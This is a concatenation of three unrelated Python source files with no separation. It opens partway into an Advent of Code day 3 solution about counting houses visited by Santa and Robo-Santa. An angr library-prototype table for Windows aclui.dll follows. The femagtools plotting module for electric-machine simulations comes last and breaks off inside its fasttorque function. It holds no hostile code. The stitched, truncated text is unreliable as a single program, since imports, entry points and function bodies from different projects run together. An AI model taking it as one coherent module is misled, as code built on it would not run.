    point: current (x, y) tuple.
    """
    # Look the delta up once instead of calling .get() twice per move.
    dx, dy = {
        '^': (0, -1),
        '<': (-1, 0),
        'v': (0, 1),
        '>': (1, 0),
    }.get(move, (0, 0))
    return (point[0] + dx, point[1] + dy)


def map_single_delivery(text):
    """Return the set of grid points visited while following *text*."""
    steps = {'^': (0, -1), '<': (-1, 0), 'v': (0, 1), '>': (1, 0)}
    x, y = 0, 0
    visited = {(0, 0)}
    for move in text:
        dx, dy = steps.get(move, (0, 0))
        x, y = x + dx, y + dy
        visited.add((x, y))
    return visited


def number_of_houses_covered(text, robo_santa=False):
    """Count distinct houses visited; with robo_santa, moves are split."""
    if robo_santa:
        return len(map_multiple_deliveries(text))
    return len(map_single_delivery(text))


def split_directions(directions):
    """Split *directions* into (Santa's moves, Robo-Santa's moves).

    Santa takes the even-indexed moves, Robo-Santa the odd-indexed ones.
    Slicing never raises for any sequence length (an empty string yields
    ('', '')), so the original try/except IndexError was dead code.
    """
    return directions[0::2], directions[1::2]


def map_multiple_deliveries(text):
    """Return the houses visited when Santa and Robo-Santa alternate moves."""
    santa_moves, robot_moves = split_directions(text)
    return map_single_delivery(santa_moves) | map_single_delivery(robot_moves)


def calculate_solution_1(text):
    """Part 1: houses covered by Santa alone."""
    return number_of_houses_covered(text, robo_santa=False)


def calculate_solution_2(text):
    """Part 2: houses covered when Robo-Santa helps."""
    return number_of_houses_covered(text, robo_santa=True)


@click.command()
@click.option('--source_file', default='data/03.txt',
              help='source data file for problem')
def main(source_file):
    """Simple solution to adventofcode problem 3."""
    # Read the whole instruction string, then count the visited houses.
    with open(source_file) as source:
        data = source.read()
    houses = number_of_houses_covered(data)
    print('Santa gave at least one present to {} houses.'.format(houses))


if __name__ == "__main__":
    sys.exit(main())

# pylint:disable=line-too-long
import logging

from ...sim_type import SimTypeFunction,     SimTypeShort, SimTypeInt, SimTypeLong, SimTypeLongLong, SimTypeDouble, SimTypeFloat,     SimTypePointer,     SimTypeChar,     SimStruct,     SimTypeFixedSizeArray,     SimTypeBottom,     SimUnion,     SimTypeBool
from ...calling_conventions import SimCCStdcall, SimCCMicrosoftAMD64
from .. import SIM_PROCEDURES as P
from . import SimLibrary


# Module-level logger for diagnostics while building this library definition.
_l = logging.getLogger(name=__name__)


# SimLibrary describing Windows' ACL editor UI library (aclui.dll):
# register default calling conventions per architecture, the library
# name, and the function prototypes declared below.
lib = SimLibrary()
lib.set_default_cc('X86', SimCCStdcall)
lib.set_default_cc('AMD64', SimCCMicrosoftAMD64)
lib.set_library_names("aclui.dll")
# Prototype table: maps exported symbol name -> SimTypeFunction signature
# (argument types, return type, and argument names).
prototypes = \
    {
        # 
        'CreateSecurityPage': SimTypeFunction([SimTypeBottom(label="ISecurityInformation")], SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), arg_names=["psi"]),
        # 
        'EditSecurity': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeBottom(label="ISecurityInformation")], SimTypeInt(signed=True, label="Int32"), arg_names=["hwndOwner", "psi"]),
        # 
        'EditSecurityAdvanced': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeBottom(label="ISecurityInformation"), SimTypeInt(signed=False, label="SI_PAGE_TYPE")], SimTypeInt(signed=True, label="Int32"), arg_names=["hwndOwner", "psi", "uSIPage"]),
    }

lib.set_prototypes(prototypes)

# -*- coding: utf-8 -*-
"""
    femagtools.plot
    ~~~~~~~~~~~~~~~

    Creating plots



"""
import numpy as np
import scipy.interpolate as ip
import logging

# Matplotlib is an optional dependency: importing this module must not fail
# when it is absent.  matplotlibversion stays 0 in that case and any later
# plotting call will fail on the undefined plt/cm names instead.
try:
    import matplotlib
    import matplotlib.pyplot as plt
    import matplotlib.cm as cm
    from mpl_toolkits.mplot3d import Axes3D
    matplotlibversion = matplotlib.__version__
except ImportError:   # ModuleNotFoundError:
    matplotlibversion = 0

# Module logger; handlers/levels are configured by the application.
logger = logging.getLogger("femagtools.plot")


def _create_3d_axis():
    """creates a subplot with 3d projection if one does not already exist"""
    from matplotlib.projections import get_projection_class
    from matplotlib import _pylab_helpers

    # Reuse the current axes when a figure is active and its axes already
    # use the 3d projection; otherwise open a fresh figure with one.
    has_active_figure = _pylab_helpers.Gcf.get_active() is not None
    if has_active_figure and isinstance(plt.gca(), get_projection_class('3d')):
        return
    plt.figure()
    plt.subplot(111, projection='3d')


def _plot_surface(ax, x, y, z, labels, azim=None):
    """Render a masked 3d surface on *ax* and label its axes.

    labels: (xlabel, ylabel, title); azim: optional view azimuth.
    """
    assert np.size(x) > 1 and np.size(y) > 1 and np.size(z) > 1
    if azim is not None:
        ax.azim = azim
    grid_x, grid_y = np.meshgrid(x, y)
    # Mask NaN/inf cells so they are left out of the surface.
    masked_z = np.ma.masked_invalid(z)
    ax.plot_surface(grid_x, grid_y, masked_z,
                    rstride=1, cstride=1,
                    cmap=cm.viridis, alpha=0.85,
                    vmin=np.nanmin(z), vmax=np.nanmax(z),
                    linewidth=0, antialiased=True)
    ax.set_xlabel(labels[0])
    ax.set_ylabel(labels[1])
    ax.set_title(labels[2])

    # plt.subplots_adjust(left=0, bottom=0, right=1, top=1, wspace=0, hspace=0)


def __phasor_plot(ax, up, idq, uxdq):
    """Draw a normalized voltage/current phasor diagram on *ax*.

    ax: target axes (0 selects the current axes via plt.gca())
    up: internal voltage magnitude
    idq: (d, q) current components
    uxdq: (d, q) voltage drop components

    All arrows are scaled by uref = max(up, uxdq[0]) so the longest
    voltage phasor has roughly unit length in plot coordinates.
    """
    uref = max(up, uxdq[0])
    uxd = uxdq[0]/uref
    uxq = uxdq[1]/uref
    # terminal voltage U1 = Up + Ux; Up is drawn along the q axis with length 1
    u1d, u1q = (uxd, 1+uxq)
    u1 = np.sqrt(u1d**2 + u1q**2)*uref
    i1 = np.linalg.norm(idq)
    # unit vector of the current phasor
    i1d, i1q = (idq[0]/i1, idq[1]/i1)

    qhw = 6   # width arrow head
    qhl = 15  # length arrow head
    qlw = 2   # line width
    qts = 10  # textsize
    # Length of the Current adjust to Ud: Initally 0.9, Maier(Oswald) = 0.5
    curfac = max(0.9, 1.5*i1q/up)

    def label_line(ax, X, Y, U, V, label, color='k', size=8):
        """Add a label to a line, at the proper angle.

        Arguments
        ---------
        line : matplotlib.lines.Line2D object,
        label : str
        x : float
        x-position to place center of text (in data coordinated
        y : float
        y-position to place center of text (in data coordinates)
        color : str
        size : float
        """

        x1, x2 = X, X + U
        y1, y2 = Y, Y + V

        if y2 == 0:
            y2 = y1
        if x2 == 0:
            x2 = x1

        # midpoint of the arrow is the label anchor
        x = (x1 + x2) / 2
        y = (y1 + y2) / 2

        # keep the label text readable (never upside down)
        slope_degrees = np.rad2deg(np.angle(U + V * 1j))
        if slope_degrees < 0:
            slope_degrees += 180
        if 90 < slope_degrees <= 270:
            slope_degrees += 180

        # shift the label perpendicular to the arrow direction
        x_offset = np.sin(np.deg2rad(slope_degrees))
        y_offset = np.cos(np.deg2rad(slope_degrees))
        bbox_props = dict(boxstyle="Round4, pad=0.1", fc="white", lw=0)
        text = ax.annotate(label, xy=(x, y), xytext=(x_offset * 10, y_offset * 8),
                           textcoords='offset points',
                           size=size, color=color,
                           horizontalalignment='center',
                           verticalalignment='center',
                           fontfamily='monospace', fontweight='bold', bbox=bbox_props)

        text.set_rotation(slope_degrees)
        return text

    if ax == 0:
        ax = plt.gca()
    ax.axes.xaxis.set_ticklabels([])
    ax.axes.yaxis.set_ticklabels([])
    # ax.set_aspect('equal')

    ax.set_title(
        r'$U_1$={0} V, $I_1$={1} A, $U_p$={2} V'.format(
            round(u1, 1), round(i1, 1), round(up, 1)), fontsize=14)

    # internal voltage Up along the q axis (thin black arrow)
    up /= uref
    ax.quiver(0, 0, 0, up, angles='xy', scale_units='xy', scale=1, units='dots',
              headwidth=qhw/2, headlength=qhl/2, headaxislength=qhl/2, width=qlw*2, color='k')
    label_line(ax, 0, 0, 0, up, '$U_p$', 'k', qts)

    # terminal voltage U1 (red)
    ax.quiver(0, 0, u1d, u1q, angles='xy', scale_units='xy', scale=1, units='dots',
              headwidth=qhw, headlength=qhl, headaxislength=qhl, width=qlw, color='r')
    label_line(ax, 0, 0, u1d, u1q, '$U_1$', 'r', qts)

    # voltage drop components (green), starting at the tip of Up at (0, 1)
    ax.quiver(0, 1, uxd, 0, angles='xy', scale_units='xy', scale=1, units='dots',
              headwidth=qhw, headlength=qhl, headaxislength=qhl, width=qlw, color='g')
    label_line(ax, 0, 1, uxd, 0, '$U_d$', 'g', qts)

    ax.quiver(uxd, 1, 0, uxq, angles='xy', scale_units='xy', scale=1, units='dots',
              headwidth=qhw, headlength=qhl, headaxislength=qhl, width=qlw, color='g')
    label_line(ax, uxd, 1, 0, uxq, '$U_q$', 'g', qts)

    # current phasor I1 (blue), length adjusted by curfac for readability
    ax.quiver(0, 0, curfac*i1d, curfac*i1q, angles='xy', scale_units='xy', scale=1,
              units='dots', headwidth=qhw, headlength=qhl, headaxislength=qhl, width=qlw, color='b')
    label_line(ax, 0, 0, curfac*i1d, curfac*i1q, '$I_1$', 'b', qts)

    # axis limits with a small margin around all drawn phasors
    xmin, xmax = (min(0, uxd, i1d), max(0, i1d, uxd))
    ymin, ymax = (min(0, i1q, 1-uxq), max(1, i1q, 1+uxq))

    ax.set_xlim([xmin-0.1, xmax+0.1])
    ax.set_ylim([ymin-0.1, ymax+0.1])
    ax.grid(True)


def i1beta_phasor(up, i1, beta, r1, xd, xq, ax=0):
    """creates a phasor plot
    up: internal voltage
    i1: current
    beta: angle i1 vs up [deg]
    r1: resistance
    xd: reactance in direct axis
    xq: reactance in quadrature axis"""
    # current components from magnitude and angle
    i1d = i1*np.sin(beta/180*np.pi)
    i1q = i1*np.cos(beta/180*np.pi)
    # voltage drop over resistance and reactances
    uxd = r1*i1d - xq*i1q
    uxq = r1*i1q + xd*i1d
    __phasor_plot(ax, up, (i1d, i1q), (uxd, uxq))


def iqd_phasor(up, iqd, uqd, ax=0):
    """creates a phasor plot
    up: internal voltage
    iqd: current
    uqd: terminal voltage"""
    # convert peak dq values to rms and express the drop relative to up
    uxdq = (uqd[1]/np.sqrt(2), (uqd[0]/np.sqrt(2)-up))
    idq_rms = (iqd[1]/np.sqrt(2), iqd[0]/np.sqrt(2))
    __phasor_plot(ax, up, idq_rms, uxdq)


def phasor(bch, ax=0):
    """create phasor plot from bch"""
    dq = bch.dqPar
    # electrical angular frequency from pole pairs and speed
    w1 = 2*np.pi*bch.machine['p']*dq['speed']
    i1beta_phasor(dq['up'][-1],
                  dq['i1'][-1], dq['beta'][-1],
                  bch.machine['r1'],
                  w1*dq['ld'][-1], w1*dq['lq'][-1], ax)


def airgap(airgap, ax=0):
    """creates plot of flux density in airgap"""
    if ax == 0:
        ax = plt.gca()
    ax.set_title('Airgap Flux Density [T]')
    pos = airgap['pos']
    ax.plot(pos, airgap['B'],
            label='Max {:4.2f} T'.format(max(airgap['B'])))
    ax.plot(pos, airgap['B_fft'],
            label='Base Ampl {:4.2f} T'.format(airgap['Bamp']))
    ax.set_xlabel('Position/°')
    ax.legend()
    ax.grid(True)


def airgap_fft(airgap, bmin=1e-2, ax=0):
    """plot airgap harmonics

    airgap: dict with 'nue' (harmonic orders) and 'B_nue' (amplitudes)
    bmin: smallest amplitude (T) that is still plotted
    ax: target axes (0 selects the current axes)
    """
    unit = 'T'
    if ax == 0:
        ax = plt.gca()
    ax.set_title('Airgap Flux Density Harmonics / {}'.format(unit))
    ax.grid(True)
    # Filter harmonics above the threshold before building the array.  The
    # original unpacked np.array([]).T outside the try block, so an empty
    # selection raised ValueError despite the except clause below.
    harmonics = [(n, b) for n, b in zip(airgap['nue'], airgap['B_nue'])
                 if b > bmin]
    if not harmonics:
        return
    order, fluxdens = np.array(harmonics).T
    try:
        markerline1, stemlines1, _ = ax.stem(order, fluxdens, '-.', basefmt=" ",
                                             use_line_collection=True)
        ax.set_xticks(order)
    except ValueError:
        pass


def torque(pos, torque, ax=0):
    """creates plot from torque vs position"""
    k = 20
    alpha = np.linspace(pos[0], pos[-1], k*len(torque))
    # quadratic interpolation for a smooth curve between samples
    interp = ip.interp1d(pos, torque, kind='quadratic')
    tmin, tmax = np.min(torque), np.max(torque)
    if tmin < -9.9e3 or tmax > 9.9e3:
        scale, unit = 1e-3, 'kNm'
    else:
        scale, unit = 1, 'Nm'
    if ax == 0:
        ax = plt.gca()
    ax.set_title('Torque / {}'.format(unit))
    ax.grid(True)
    ax.plot(pos, [scale*t for t in torque], 'go')
    ax.plot(alpha, scale*interp(alpha))
    # anchor the axis at zero when all values share one sign
    if tmin > 0 and tmax > 0:
        ax.set_ylim(bottom=0)
    elif tmin < 0 and tmax < 0:
        ax.set_ylim(top=0)


def torque_fft(order, torque, ax=0):
    """plot torque harmonics"""
    scale, unit = 1, 'Nm'
    if np.min(torque) < -9.9e3 or np.max(torque) > 9.9e3:
        scale, unit = 1e-3, 'kNm'
    if ax == 0:
        ax = plt.gca()
    ax.set_title('Torque Harmonics / {}'.format(unit))
    ax.grid(True)

    try:
        # bar width relative to the largest harmonic order
        bar_width = 2.5E-2*max(order)
        ax.bar(order, [scale*t for t in torque], width=bar_width, align='center')
        ax.set_xlim(left=-bar_width/2)
    except ValueError:  # empty sequence
        pass


def force(title, pos, force, xlabel='', ax=0):
    """plot force vs position"""
    fmin, fmax = min(force), max(force)
    if fmin < -9.9e3 or fmax > 9.9e3:
        scale, unit = 1e-3, 'kN'
    else:
        scale, unit = 1, 'N'
    if ax == 0:
        ax = plt.gca()
    ax.set_title('{} / {}'.format(title, unit))
    ax.grid(True)
    ax.plot(pos, [scale*f for f in force])
    if xlabel:
        ax.set_xlabel(xlabel)
    # anchor at zero when all forces are positive
    if fmin > 0:
        ax.set_ylim(bottom=0)


def force_fft(order, force, ax=0):
    """plot force harmonics"""
    scale, unit = 1, 'N'
    if min(force) < -9.9e3 or max(force) > 9.9e3:
        scale, unit = 1e-3, 'kN'
    if ax == 0:
        ax = plt.gca()
    ax.set_title('Force Harmonics / {}'.format(unit))
    ax.grid(True)
    try:
        # bar width relative to the largest harmonic order
        bar_width = 2.5E-2*max(order)
        ax.bar(order, [scale*t for t in force], width=bar_width, align='center')
        ax.set_xlim(left=-bar_width/2)
    except ValueError:  # empty sequence
        pass


def forcedens(title, pos, fdens, ax=0):
    """plot force densities"""
    if ax == 0:
        ax = plt.gca()
    ax.set_title(title)
    ax.grid(True)
    # fdens[0]: tangential component, fdens[1]: normal component (N/m²)
    tangential, normal = fdens[0], fdens[1]
    ax.plot(pos, [1e-3*ft for ft in tangential], label='F tang')
    ax.plot(pos, [1e-3*fn for fn in normal], label='F norm')
    ax.legend()
    ax.set_xlabel('Pos / deg')
    ax.set_ylabel('Force Density / kN/m²')


def forcedens_surface(fdens, ax=0):
    """surface plot of the normal force density over rotor position"""
    if ax == 0:
        _create_3d_axis()
        ax = plt.gca()
    xpos = list(fdens.positions[0]['X'])
    ypos = [p['position'] for p in fdens.positions]
    # normal force density in kN/m²
    z = 1e-3*np.array([p['FN'] for p in fdens.positions])
    _plot_surface(ax, xpos, ypos, z,
                  (u'Rotor pos/°', u'Pos/°', u'F N / kN/m²'))


def forcedens_fft(title, fdens, ax=0):
    """plot force densities FFT
    Args:
      title: plot title
      fdens: force density object
    """
    if ax == 0:
        ax = plt.axes(projection="3d")

    spectrum = 1e-3*fdens.fft()
    fmin = 0.2
    num_bars = spectrum.shape[0] + 1
    grid_m, grid_n = np.meshgrid(np.arange(1, num_bars),
                                 np.arange(1, num_bars))
    # keep only components above the fmin threshold
    mask = spectrum > fmin
    heights = spectrum[mask]
    x_pos, y_pos = grid_m[mask], grid_n[mask]
    z_pos = np.zeros_like(heights)
    x_size = 2
    y_size = 2

    ax.bar3d(x_pos, y_pos, z_pos, x_size, y_size, heights)
    ax.view_init(azim=120)
    ax.set_xlim(0, num_bars+1)
    ax.set_ylim(0, num_bars+1)
    ax.set_title(title)
    ax.set_xlabel('M')
    ax.set_ylabel('N')
    ax.set_zlabel('kN/m²')


def winding_flux(pos, flux, ax=0):
    """plot flux vs position"""
    if ax == 0:
        ax = plt.gca()
    ax.set_title('Winding Flux / Vs')
    ax.grid(True)
    # one curve per winding
    for positions, values in zip(pos, flux):
        ax.plot(positions, values)


def winding_current(pos, current, ax=0):
    """plot winding currents"""
    if ax == 0:
        ax = plt.gca()
    ax.set_title('Winding Currents / A')
    ax.grid(True)
    # one curve per winding
    for positions, values in zip(pos, current):
        ax.plot(positions, values)


def voltage(title, pos, voltage, ax=0):
    """plot voltage vs. position"""
    if ax == 0:
        ax = plt.gca()
    ax.grid(True)
    ax.set_title('{} / V'.format(title))
    ax.plot(pos, voltage)


def voltage_fft(title, order, voltage, ax=0):
    """plot FFT harmonics of voltage

    title: plot title
    order: harmonic orders
    voltage: amplitude per order
    ax: target axes (0 selects the current axes)
    """
    if ax == 0:
        ax = plt.gca()
    ax.set_title('{} / V'.format(title))
    ax.grid(True)
    if max(order) < 5:
        # Pad with a zero 5th harmonic so the x axis keeps a sensible range.
        # Build new lists: the original ``order += [5]`` mutated the
        # caller's lists in place, growing stored data on every call.
        order = list(order) + [5]
        voltage = list(voltage) + [0]
    try:
        bw = 2.5E-2*max(order)
        ax.bar(order, voltage, width=bw, align='center')
    except ValueError:  # empty sequence
        pass


def mcv_hbj(mcv, log=True, ax=0):
    """plot H, B, J of mcv dict

    mcv: magnetization-curve record with keys 'name', 'ctype' and 'curve'
         (a list of dicts with 'bi'/'hi' sample arrays)
    log: plot H on a logarithmic axis when True
    ax: target axes (0 selects the current axes)
    """
    import femagtools.mcv
    MUE0 = 4e-7*np.pi  # vacuum permeability
    ji = []

    csiz = len(mcv['curve'])
    if ax == 0:
        ax = plt.gca()
    ax.set_title(mcv['name'])
    for k, c in enumerate(mcv['curve']):
        # sample pairs as (B / T, H / kA/m)
        bh = [(bi, hi*1e-3)
              for bi, hi in zip(c['bi'],
                                c['hi'])]
        try:
            # polarisation J = B - mue0*H, only for a single magnetization curve
            if csiz == 1 and mcv['ctype'] in (femagtools.mcv.MAGCRV,
                                              femagtools.mcv.ORIENT_CRV):
                ji = [b-MUE0*h*1e3 for b, h in bh]
        except Exception:
            pass
        bi, hi = zip(*bh)

        label = 'Flux Density'
        if csiz > 1:
            # NOTE(review): attribute access ``mcv.mc1_angle`` is inconsistent
            # with the dict-style ``mcv['...']`` used elsewhere in this
            # function — confirm mcv objects support both access styles.
            label = 'Flux Density ({0}°)'.format(mcv.mc1_angle[k])
        if log:
            ax.semilogx(hi, bi, label=label)
            if ji:
                ax.semilogx(hi, ji, label='Polarisation')
        else:
            ax.plot(hi, bi, label=label)
            if ji:
                ax.plot(hi, ji, label='Polarisation')
    ax.set_xlabel('H / kA/m')
    ax.set_ylabel('T')
    if ji or csiz > 1:
        ax.legend(loc='lower right')
    ax.grid()

def mcv_muer(mcv, ax=0):
    """plot rel. permeability vs. B of mcv dict"""
    MUE0 = 4e-7*np.pi
    curve = mcv['curve'][0]
    # mu_r = B / (mue0 * H); skip samples with H == 0
    pairs = [(bx, bx/hx/MUE0)
             for bx, hx in zip(curve['bi'], curve['hi']) if not hx == 0]
    bi, ur = zip(*pairs)
    if ax == 0:
        ax = plt.gca()
    ax.plot(bi, ur)
    ax.set_xlabel('B / T')
    ax.set_title('rel. Permeability')
    ax.grid()


def mtpa(pmrel, i1max, title='', projection='', ax=0):
    """create a line or surface plot with torque and mtpa curve

    pmrel: machine model providing mtpa/iqdmax/iqdmin/torque_iqd
    i1max: maximum phase current
    title: optional plot title
    projection: '3d' for a torque surface, otherwise contour lines
    ax: target axes (0 selects the current axes)
    """
    nsamples = 10
    i1 = np.linspace(0, i1max, nsamples)
    iopt = np.array([pmrel.mtpa(x) for x in i1]).T

    iqmax, idmax = pmrel.iqdmax(i1max)
    iqmin, idmin = pmrel.iqdmin(i1max)

    if projection == '3d':
        nsamples = 50
    else:
        if iqmin == 0:
            iqmin = 0.1*iqmax
    # renamed from ``id`` to avoid shadowing the builtin
    id_range = np.linspace(idmin, idmax, nsamples)
    iq_range = np.linspace(iqmin, iqmax, nsamples)

    torque_iqd = np.array(
        [[pmrel.torque_iqd(x, y)
          for y in id_range] for x in iq_range])
    if projection == '3d':
        ax = idq_torque(id_range, iq_range, torque_iqd, ax)
        # NOTE(review): iopt[2][-1] is a scalar, so np.max() is a no-op here;
        # possibly np.max(iopt[2]) was intended — confirm.
        ax.plot(iopt[1], iopt[0], iopt[2],
                color='red', linewidth=2, label='MTPA: {0:5.0f} Nm'.format(
                    np.max(iopt[2][-1])))
    else:
        if ax == 0:
            ax = plt.gca()

        ax.set_aspect('equal')
        x, y = np.meshgrid(id_range, iq_range)
        CS = ax.contour(x, y, torque_iqd, 6, colors='k')
        ax.clabel(CS, fmt='%d', inline=1)

        ax.set_xlabel('Id/A')
        ax.set_ylabel('Iq/A')
        ax.plot(iopt[1], iopt[0],
                color='red', linewidth=2, label='MTPA: {0:5.0f} Nm'.format(
                    np.max(iopt[2][-1])))
        ax.grid()

    if title:
        ax.set_title(title)
    ax.legend()


def mtpv(pmrel, u1max, i1max, title='', projection='', ax=0):
    """create a line or surface plot with voltage and mtpv curve

    pmrel: machine model providing w2_imax_umax/iqdmax/iqdmin/uqd/mtpv
    u1max: maximum phase voltage
    i1max: maximum phase current
    title: optional plot title
    projection: '3d' for a torque surface, otherwise voltage contours
    ax: target axes (0 selects the current axes)
    """
    w1 = pmrel.w2_imax_umax(i1max, u1max)
    nsamples = 20
    if projection == '3d':
        nsamples = 50

    iqmax, idmax = pmrel.iqdmax(i1max)
    iqmin, idmin = pmrel.iqdmin(i1max)
    # renamed from ``id`` to avoid shadowing the builtin
    id_range = np.linspace(idmin, idmax, nsamples)
    iq_range = np.linspace(iqmin, iqmax, nsamples)
    u1_iqd = np.array(
        [[np.linalg.norm(pmrel.uqd(w1, iqx, idx))/np.sqrt(2)
          for idx in id_range] for iqx in iq_range])
    u1 = np.mean(u1_iqd)
    imtpv = np.array([pmrel.mtpv(wx, u1, i1max)
                      for wx in np.linspace(w1, 20*w1, nsamples)]).T

    if projection == '3d':
        torque_iqd = np.array(
            [[pmrel.torque_iqd(x, y)
              for y in id_range] for x in iq_range])
        ax = idq_torque(id_range, iq_range, torque_iqd, ax)
        ax.plot(imtpv[1], imtpv[0], imtpv[2],
                color='red', linewidth=2)
    else:
        if ax == 0:
            ax = plt.gca()
        ax.set_aspect('equal')
        x, y = np.meshgrid(id_range, iq_range)
        CS = ax.contour(x, y, u1_iqd, 4, colors='b')  # linestyles='dashed')
        ax.clabel(CS, fmt='%d', inline=1)

        ax.plot(imtpv[1], imtpv[0],
                color='red', linewidth=2,
                label='MTPV: {0:5.0f} Nm'.format(np.max(imtpv[2])))

        ax.grid()
        ax.legend()
    ax.set_xlabel('Id/A')
    ax.set_ylabel('Iq/A')
    if title:
        ax.set_title(title)


def __get_linearForce_title_keys(lf):
    """Return plot titles and dict keys matching the force components in *lf*."""
    if 'force_r' in lf:
        titles, keys = ['Force r', 'Force z'], ['force_r', 'force_z']
    else:
        titles, keys = ['Force x', 'Force y'], ['force_x', 'force_y']
    return titles, keys


def pmrelsim(bch, title=''):
    """creates a plot of a PM/Rel motor simulation

    bch: BCH result object with torque/linearForce and flux data
    title: optional figure title
    """
    cols = 2
    rows = 4
    # extra row for the no-load voltage plots
    if len(bch.flux['1']) > 1:
        rows += 1
    htitle = 1.5 if title else 0
    fig, ax = plt.subplots(nrows=rows, ncols=cols,
                           figsize=(10, 3*rows + htitle))
    if title:
        fig.suptitle(title, fontsize=16)

    row = 1
    plt.subplot(rows, cols, row)
    if bch.torque:
        # rotating machine: torque and force components vs angle
        torque(bch.torque[-1]['angle'], bch.torque[-1]['torque'])
        plt.subplot(rows, cols, row+1)
        tq = list(bch.torque_fft[-1]['torque'])
        order = list(bch.torque_fft[-1]['order'])
        # pad so the harmonics plot keeps a sensible x range
        if order and max(order) < 5:
            order += [15]
            tq += [0]
        torque_fft(order, tq)
        plt.subplot(rows, cols, row+2)
        force('Force Fx',
              bch.torque[-1]['angle'], bch.torque[-1]['force_x'])
        plt.subplot(rows, cols, row+3)
        force('Force Fy',
              bch.torque[-1]['angle'], bch.torque[-1]['force_y'])
        row += 3
    elif bch.linearForce:
        # linear machine: forces vs displacement
        title, keys = __get_linearForce_title_keys(bch.linearForce[-1])
        force(title[0], bch.linearForce[-1]['displ'],
              bch.linearForce[-1][keys[0]], 'Displt. / mm')
        plt.subplot(rows, cols, row+1)
        force_fft(bch.linearForce_fft[-2]['order'],
                  bch.linearForce_fft[-2]['force'])
        plt.subplot(rows, cols, row+2)
        force(title[1], bch.linearForce[-1]['displ'],
              bch.linearForce[-1][keys[1]], 'Displt. / mm')
        plt.subplot(rows, cols, row+3)
        force_fft(bch.linearForce_fft[-1]['order'],
                  bch.linearForce_fft[-1]['force'])
        row += 3

    plt.subplot(rows, cols, row+1)
    flux = [bch.flux[k][-1] for k in bch.flux]
    pos = [f['displ'] for f in flux]
    winding_flux(pos,
                 [f['flux_k'] for f in flux])
    plt.subplot(rows, cols, row+2)
    winding_current(pos,
                    [f['current_k'] for f in flux])
    plt.subplot(rows, cols, row+3)
    voltage('Internal Voltage',
            bch.flux['1'][-1]['displ'],
            bch.flux['1'][-1]['voltage_dpsi'])
    plt.subplot(rows, cols, row+4)
    try:
        voltage_fft('Internal Voltage Harmonics',
                    bch.flux_fft['1'][-1]['order'],
                    bch.flux_fft['1'][-1]['voltage'])
    except Exception:  # was a bare except; don't swallow SystemExit etc.
        pass
    if len(bch.flux['1']) > 1:
        plt.subplot(rows, cols, row+5)
        voltage('No Load Voltage',
                bch.flux['1'][0]['displ'],
                bch.flux['1'][0]['voltage_dpsi'])
        plt.subplot(rows, cols, row+6)
        try:
            voltage_fft('No Load Voltage Harmonics',
                        bch.flux_fft['1'][0]['order'],
                        bch.flux_fft['1'][0]['voltage'])
        except Exception:  # was a bare except
            pass
    fig.tight_layout(h_pad=3.5)
    if title:
        fig.subplots_adjust(top=0.92)


def multcal(bch, title=''):
    """creates a plot of a MULT CAL simulation

    bch: BCH result object with torque/linearForce and flux data
    title: optional figure title
    """
    cols = 2
    rows = 4
    # Extra row for the no-load voltage plots.  This was missing: without it
    # the subplot indices row+5/row+6 exceed the 4x2 grid and raise
    # ValueError (pmrelsim/fasttorque already increment rows here).
    if len(bch.flux['1']) > 1:
        rows += 1
    htitle = 1.5 if title else 0
    fig, ax = plt.subplots(nrows=rows, ncols=cols,
                           figsize=(10, 3*rows + htitle))
    if title:
        fig.suptitle(title, fontsize=16)

    row = 1
    plt.subplot(rows, cols, row)
    if bch.torque:
        # rotating machine: torque and force components vs angle
        torque(bch.torque[-1]['angle'], bch.torque[-1]['torque'])
        plt.subplot(rows, cols, row+1)
        tq = list(bch.torque_fft[-1]['torque'])
        order = list(bch.torque_fft[-1]['order'])
        # pad so the harmonics plot keeps a sensible x range
        if order and max(order) < 5:
            order += [15]
            tq += [0]
        torque_fft(order, tq)
        plt.subplot(rows, cols, row+2)
        force('Force Fx',
              bch.torque[-1]['angle'], bch.torque[-1]['force_x'])
        plt.subplot(rows, cols, row+3)
        force('Force Fy',
              bch.torque[-1]['angle'], bch.torque[-1]['force_y'])
        row += 3
    elif bch.linearForce:
        # linear machine: forces vs displacement
        title, keys = __get_linearForce_title_keys(bch.linearForce[-1])
        force(title[0], bch.linearForce[-1]['displ'],
              bch.linearForce[-1][keys[0]], 'Displt. / mm')
        plt.subplot(rows, cols, row+1)
        force_fft(bch.linearForce_fft[-2]['order'],
                  bch.linearForce_fft[-2]['force'])
        plt.subplot(rows, cols, row+2)
        force(title[1], bch.linearForce[-1]['displ'],
              bch.linearForce[-1][keys[1]], 'Displt. / mm')
        plt.subplot(rows, cols, row+3)
        force_fft(bch.linearForce_fft[-1]['order'],
                  bch.linearForce_fft[-1]['force'])
        row += 3

    plt.subplot(rows, cols, row+1)
    flux = [bch.flux[k][-1] for k in bch.flux]
    pos = [f['displ'] for f in flux]
    winding_flux(pos,
                 [f['flux_k'] for f in flux])
    plt.subplot(rows, cols, row+2)
    winding_current(pos,
                    [f['current_k'] for f in flux])
    plt.subplot(rows, cols, row+3)
    voltage('Internal Voltage',
            bch.flux['1'][-1]['displ'],
            bch.flux['1'][-1]['voltage_dpsi'])
    plt.subplot(rows, cols, row+4)
    try:
        voltage_fft('Internal Voltage Harmonics',
                    bch.flux_fft['1'][-1]['order'],
                    bch.flux_fft['1'][-1]['voltage'])
    except Exception:  # was a bare except; don't swallow SystemExit etc.
        pass
    if len(bch.flux['1']) > 1:
        plt.subplot(rows, cols, row+5)
        voltage('No Load Voltage',
                bch.flux['1'][0]['displ'],
                bch.flux['1'][0]['voltage_dpsi'])
        plt.subplot(rows, cols, row+6)
        try:
            voltage_fft('No Load Voltage Harmonics',
                        bch.flux_fft['1'][0]['order'],
                        bch.flux_fft['1'][0]['voltage'])
        except Exception:  # was a bare except
            pass
    # dedented: apply the layout unconditionally, as in pmrelsim/fasttorque
    fig.tight_layout(h_pad=3.5)
    if title:
        fig.subplots_adjust(top=0.92)


def fasttorque(bch, title=''):
    """creates a plot of a Fast Torque simulation

    bch: BCH result object with torque/linearForce and flux data
    title: optional figure title
    """
    cols = 2
    rows = 4
    # extra row for the no-load voltage plots
    if len(bch.flux['1']) > 1:
        rows += 1
    htitle = 1.5 if title else 0
    fig, ax = plt.subplots(nrows=rows, ncols=cols,
                           figsize=(10, 3*rows + htitle))
    if title:
        fig.suptitle(title, fontsize=16)

    row = 1
    plt.subplot(rows, cols, row)
    if bch.torque:
